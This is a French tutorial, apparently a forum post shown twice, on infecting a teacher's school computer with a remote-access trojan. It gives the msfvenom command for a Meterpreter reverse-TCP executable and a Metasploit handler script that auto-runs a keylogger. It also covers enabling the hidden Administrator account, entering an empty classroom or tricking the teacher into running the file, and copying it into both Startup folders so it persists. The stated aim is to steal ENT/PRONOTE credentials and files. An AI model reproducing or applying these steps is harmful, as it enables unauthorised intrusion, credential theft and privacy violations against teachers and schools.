I - Réflexion et mise en place
Réfléchissons aux différentes méthodes et leurs efficacités :
- Keylogger ► On lance un .exe qui enregistrera toutes lesfrappes du clavier.
- Cheval de Troie / RAT ► On lance un .exe qui nousdonneras bien plus d'accès à la machine.(Keylogger/Fichiers/Upload/Start VIRUS.exe/ enfin vousconnaissez le but d'un RAT je pense)
- Phishing ► On envoie une page piégée de Pronote. (Trèsrisqué et peu de chance de fonctionner)
II - Ce que j’ai choisi
Personnellement j'ai décidé de RAT, c'est
bien plus simple et bien plus amusant et
on peut trouver des choses intéressantes
sur un ordi professeur (corrigés, USBPerso, cours, ect..)
Maintenant que nous avons décidé la
méthode d'attaque, il nous faut mettre en
place tout ça.
III - Création du RAT
Pour avoir un rendu fiable et sans problème, j'ai décidé de créer un .exe avec msfvenom
1) Génération du .exe
Pour générer notre jolie exe j'ai utilisé le Tool très connu "msfvenom"
Pour l'installer rien de plus simple :
I. On installe le Tool :
II. Maintenant on va fait en sorte d’avoir toute les permission cmd :
III. Ensuite on se rends dans le dossier root
IV. Puis on va enfin créer notre .exe
V. Ensuite on va voir si le fichier a bien été crée
Normalement vous devriez voir votre fichier « win10.exe »
VI. Maintenant on va faire en sorte que le fichier se place dans le dossier boot
VII. Ensuite je vais vous montrer comment avoir le fichier (pour les débutants), pour trouver votre fichier
suivez les instructions suivantes :
1)
2)
3)
4)
VIII. Ensuite vous faite passer le fichier de kali linux à Windows soit par DND (Drag And Drop) ou
(glisser déposer) soit via une clé USB si vous le faite par une clé USB voici comment faire (encore
une fois pour les débutants) :
1) Brancher votre clé USB
2) Aller dans « Périphériques », « USB » et repérer votre clé USB pour la repérer regarder votre écran tout en débranchantet en rebranchant votre clé USB et vous devrez voir le nom de votre clé USB apparaitre et disparaitre
3) Ensuite une fois que vous avez repérer votre clé USB cocher là.
4) Ensuite votre clé USB devrait apparaitre ici :
5) Ensuite retourner dans le fichier boot faite un clic droit sur le fichier « win10.exe » et fait « Copy to » ou « Copier vers »et sélectionner votre clé USB
6) Apres avoir mis votre fichier sur votre clé USB il ne vous reste plus qu’à automatiser le processus en lançant
automatiquement le keylogger via METASPLOIT :
IX. Créer le fichier « start.rc » (n’oublier pas de lancer le terminal en mode admin en tapant la
commande
)
X. On entre dans le fichier start.rc
XI. Modifions maintenant le .rc
XII. Collez ceci dans le fichier
XIII. Maintenant il vous faut lancer tout ça avec la commande (cette commande est à lancer juste avant que vous partiez de chez vous pour allais en cours)
2) Ouvrir le RAT sur l'ordinateur d'un professeur
Vous venez de réaliser le plus difficile, maintenant il vous faut contourner les droits administrateurs
vous aller me demander pourquoi ? et bien vous allais le comprendre très vite
Pour contourner les droits administrateurs vous devrais juste :
1) Ouvrez l'explorateur de fichiers
2) Allez dans C:\Windows\System32
3) Lancer le programme cmd.exe en Admin (clique droit > droits admins)
4) Tapez :
Le cmd doit afficher "La commande s'est bien terminée"
Sinon essayez :
5) Fermer tout
6) Fermer votre session
7) Connectez-vous ensuite la session administrateur
8) Et Normalement vous serez admin.
I. Bon Maintenant il faut lancer le fichier « win10.exe » sur l’ordinateur du prof et je vais vous
donner plusieurs méthodes :
1) Pour la première méthode, qui est je pense la plus facile est que si vous avez deux portes dans votre salle de classe il y en a toujours une que vous pouvez ouvrir de l’intérieur alors ouvrez cette porte de l’intérieur discrètement, ensuite quand vous aurais 1h de perme ou quand vous devrez manger et que vous êtes sûr qu’il n’y a pas une autre classe dans la salle vous rentrerais par la porte que vous avez ouverte auparavant et vous ouvrirais le fichier etc…
OÙ
2) Pour la deuxième méthode je ne vous la conseille absolument pas car le keylogger ne vas
pas se lancer automatiquement au démarrage de l'ordinateur à cause de cette méthode (et vous devrez donc communiquer avec le prof pour ouvrir votre fichier vous même) vous aller comprendre pourquoi :
Attention :
► Ne pas paniquer, plus vous êtes calmes, plus le prof ne sera d'aucune méfiance
► Prévoir son coup (fin du cours par exemple, ou au début)
ATTENTION : N'oubliez pas que le prof doit taper ses identifiants de connexion ENT ou PRONOTE après avoir lancé votre RAT, donc il faut l'emmener à le faire, lui donner une bonne raison de se connecter, ou il le fera tout seul pour faire l'appel.
Tout est dans la communication, dans les mots que vous choisirez pour le convaincre de seconnecter à son espace.
En résumer cette deuxièmes méthode consiste a parler au prof en disant par exemple que vous voulez tester votre PowerPoint (donc utiliser un binder)
II. Bon ensuite (si vous avez appliquer la première méthode et que vous êtes donc seul dans la classe) vous brancherais votre clé USB a l’ordinateur vous ouvrirais le fichier « win10.exe »
ensuite taper sur les touches windows + r simultanément et taper :
ou rendez vous directement vers ce chemin d'accès pour coller votre fichier « win10.exe » :
ensuite re taper sur les touches windows + r simultanément et taper
ou rendez vous directement vers ce chemin d'accès pour coller votre fichier « win10.exe » :
(ATTENTION : COLLER BIEN VOTRE FICHIER A CES DEUX CHEMIN D'ACCES DIFFERENT COMME SA VOUS SEREZ SUR QUE VOTRE FICHIER SE LANCE BIEN AU DEMARRAGE DU PC SUR TOUTE LES SESSIONS) :
Ensuite vous pourrais vous déconnecter de votre session et partir de la salle
Voilà le ebook est terminé j'espère que vous avais tous compris
Si vous avez des questions contacter moi sur discord : kutoramo.films ou via le serveur https://discord.gg/mRSESakqNe
Réfléchissons aux différentes méthodes et leurs efficacités :
- Keylogger ► On lance un .exe qui enregistrera toutes lesfrappes du clavier.
- Cheval de Troie / RAT ► On lance un .exe qui nousdonneras bien plus d'accès à la machine.(Keylogger/Fichiers/Upload/Start VIRUS.exe/ enfin vousconnaissez le but d'un RAT je pense)
- Phishing ► On envoie une page piégée de Pronote. (Trèsrisqué et peu de chance de fonctionner)
II - Ce que j’ai choisi
Personnellement j'ai décidé de RAT, c'est
bien plus simple et bien plus amusant et
on peut trouver des choses intéressantes
sur un ordi professeur (corrigés, USBPerso, cours, ect..)
Maintenant que nous avons décidé la
méthode d'attaque, il nous faut mettre en
place tout ça.
III - Création du RAT
Pour avoir un rendu fiable et sans problème, j'ai décidé de créer un .exe avec msfvenom
1) Génération du .exe
Pour générer notre jolie exe j'ai utilisé le Tool très connu "msfvenom"
Pour l'installer rien de plus simple :
I. On installe le Tool :
Code:
sudo apt install metasploit-frameworkII. Maintenant on va fait en sorte d’avoir toute les permission cmd :
Code:
sudo suIII. Ensuite on se rends dans le dossier root
Code:
cd /rootIV. Puis on va enfin créer notre .exe
Code:
msfvenom -p windows/meterpreter/reverse_tcp lhost=REMPLACER PAR VOTRE
IP ! lport=4444 -f exe >win10.exeV. Ensuite on va voir si le fichier a bien été crée
Code:
lsNormalement vous devriez voir votre fichier « win10.exe »
VI. Maintenant on va faire en sorte que le fichier se place dans le dossier boot
Code:
cp win10.exe /bootVII. Ensuite je vais vous montrer comment avoir le fichier (pour les débutants), pour trouver votre fichier
suivez les instructions suivantes :
1)
2)
3)
4)
VIII. Ensuite vous faite passer le fichier de kali linux à Windows soit par DND (Drag And Drop) ou
(glisser déposer) soit via une clé USB si vous le faite par une clé USB voici comment faire (encore
une fois pour les débutants) :
1) Brancher votre clé USB
2) Aller dans « Périphériques », « USB » et repérer votre clé USB pour la repérer regarder votre écran tout en débranchantet en rebranchant votre clé USB et vous devrez voir le nom de votre clé USB apparaitre et disparaitre
3) Ensuite une fois que vous avez repérer votre clé USB cocher là.
4) Ensuite votre clé USB devrait apparaitre ici :
5) Ensuite retourner dans le fichier boot faite un clic droit sur le fichier « win10.exe » et fait « Copy to » ou « Copier vers »et sélectionner votre clé USB
6) Apres avoir mis votre fichier sur votre clé USB il ne vous reste plus qu’à automatiser le processus en lançant
automatiquement le keylogger via METASPLOIT :
IX. Créer le fichier « start.rc » (n’oublier pas de lancer le terminal en mode admin en tapant la
commande
Code:
sudo su
Code:
mkdir start.rcX. On entre dans le fichier start.rc
Code:
cd start.rcXI. Modifions maintenant le .rc
Code:
nano start.rcXII. Collez ceci dans le fichier
Code:
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST REMPLACEZ PAR VOTRE IP !
set LPORT 4444
set AutoRunScript post/windows/capture/keylog_recorder
exploit -j -zXIII. Maintenant il vous faut lancer tout ça avec la commande (cette commande est à lancer juste avant que vous partiez de chez vous pour allais en cours)
Code:
sudo msfconsole -r start.rc2) Ouvrir le RAT sur l'ordinateur d'un professeur
Vous venez de réaliser le plus difficile, maintenant il vous faut contourner les droits administrateurs
vous aller me demander pourquoi ? et bien vous allais le comprendre très vite
Pour contourner les droits administrateurs vous devrais juste :
1) Ouvrez l'explorateur de fichiers
2) Allez dans C:\Windows\System32
3) Lancer le programme cmd.exe en Admin (clique droit > droits admins)
4) Tapez :
Code:
net user Administrateur /active:yesSinon essayez :
Code:
net user Administrator /active:yes6) Fermer votre session
7) Connectez-vous ensuite la session administrateur
8) Et Normalement vous serez admin.
I. Bon Maintenant il faut lancer le fichier « win10.exe » sur l’ordinateur du prof et je vais vous
donner plusieurs méthodes :
1) Pour la première méthode, qui est je pense la plus facile est que si vous avez deux portes dans votre salle de classe il y en a toujours une que vous pouvez ouvrir de l’intérieur alors ouvrez cette porte de l’intérieur discrètement, ensuite quand vous aurais 1h de perme ou quand vous devrez manger et que vous êtes sûr qu’il n’y a pas une autre classe dans la salle vous rentrerais par la porte que vous avez ouverte auparavant et vous ouvrirais le fichier etc…
OÙ
2) Pour la deuxième méthode je ne vous la conseille absolument pas car le keylogger ne vas
pas se lancer automatiquement au démarrage de l'ordinateur à cause de cette méthode (et vous devrez donc communiquer avec le prof pour ouvrir votre fichier vous même) vous aller comprendre pourquoi :
Attention :
► Ne pas paniquer, plus vous êtes calmes, plus le prof ne sera d'aucune méfiance
► Prévoir son coup (fin du cours par exemple, ou au début)
ATTENTION : N'oubliez pas que le prof doit taper ses identifiants de connexion ENT ou PRONOTE après avoir lancé votre RAT, donc il faut l'emmener à le faire, lui donner une bonne raison de se connecter, ou il le fera tout seul pour faire l'appel.
Tout est dans la communication, dans les mots que vous choisirez pour le convaincre de seconnecter à son espace.
En résumer cette deuxièmes méthode consiste a parler au prof en disant par exemple que vous voulez tester votre PowerPoint (donc utiliser un binder)
II. Bon ensuite (si vous avez appliquer la première méthode et que vous êtes donc seul dans la classe) vous brancherais votre clé USB a l’ordinateur vous ouvrirais le fichier « win10.exe »
ensuite taper sur les touches windows + r simultanément et taper :
Code:
shell:startupou rendez vous directement vers ce chemin d'accès pour coller votre fichier « win10.exe » :
Code:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startupensuite re taper sur les touches windows + r simultanément et taper
Code:
shell:common startupou rendez vous directement vers ce chemin d'accès pour coller votre fichier « win10.exe » :
Code:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup(ATTENTION : COLLER BIEN VOTRE FICHIER A CES DEUX CHEMIN D'ACCES DIFFERENT COMME SA VOUS SEREZ SUR QUE VOTRE FICHIER SE LANCE BIEN AU DEMARRAGE DU PC SUR TOUTE LES SESSIONS) :
Ensuite vous pourrais vous déconnecter de votre session et partir de la salle
Voilà le ebook est terminé j'espère que vous avais tous compris
Si vous avez des questions contacter moi sur discord : kutoramo.films ou via le serveur https://discord.gg/mRSESakqNe
